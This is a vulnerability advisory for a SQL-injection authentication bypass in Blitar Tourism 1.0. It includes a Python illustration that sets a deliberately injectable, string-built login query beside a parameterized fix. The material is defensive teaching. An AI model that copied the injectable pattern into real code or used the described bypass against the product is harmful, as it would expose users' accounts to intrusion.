Vendor: Blitar Tourism
By: sigeri94
CVSS: 8.8 (HIGH)
Authentication Bypass SQLi
CWE: 89
Product Name: Blitar Tourism
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodeaplikasi.info:blitar_tourism:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2021
Blitar Tourism 1.0 – Authentication Bypass SQLi
An authentication bypass vulnerability exists in Blitar Tourism 1.0. An attacker can exploit this vulnerability by sending a crafted HTTP POST request with malicious SQL injection payloads in the username parameter. This can allow an attacker to bypass authentication and gain access to the application.
Mitigation:
Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
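
The difference between a string-built login lookup and a parameterized one, as an added example that is not code from Blitar Tourism or from the advisory. Python with an in-memory sqlite3 database stands in for the application's own stack, which the page does not show; the table layout, function names and sample accounts are constructed for the illustration.

```python
import hashlib
import hmac
import os
import sqlite3

def pw_hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, hash BLOB)")
    for name, pw in (("admin", "s3cret-admin"), ("o'brien", "s3cret-ob")):
        salt = os.urandom(16)
        db.execute("INSERT INTO users VALUES (?, ?, ?)", (name, salt, pw_hash(pw, salt)))
    return db

def login_string_built(db, username: str, password: str) -> bool:
    """Weak pattern: username is spliced into the SQL text, so the engine parses it as SQL."""
    sql = "SELECT salt, hash FROM users WHERE username = '" + username + "'"
    row = db.execute(sql).fetchone()
    return row is not None and hmac.compare_digest(row[1], pw_hash(password, row[0]))

def login_parameterized(db, username: str, password: str) -> bool:
    """Corrected pattern: username is bound as data and can never alter the statement."""
    row = db.execute(
        "SELECT salt, hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    # Hash against a dummy salt when the user is unknown so both paths do equal work.
    salt, stored = row if row else (b"\x00" * 16, b"")
    return hmac.compare_digest(stored, pw_hash(password, salt)) and row is not None

if __name__ == "__main__":
    db = make_db()
    # Bound value: the apostrophe in a legitimate username is plain data.
    print(login_parameterized(db, "o'brien", "s3cret-ob"))
    try:
        login_string_built(db, "o'brien", "s3cret-ob")
    except sqlite3.OperationalError as exc:
        # A quote in the input reached the SQL grammar: the sign of an injectable query.
        print("string-built query broke on a quote:", exc)
```

A login form that returns a database error when the username contains an apostrophe is a quick indicator during code review or testing that the query is being assembled from strings.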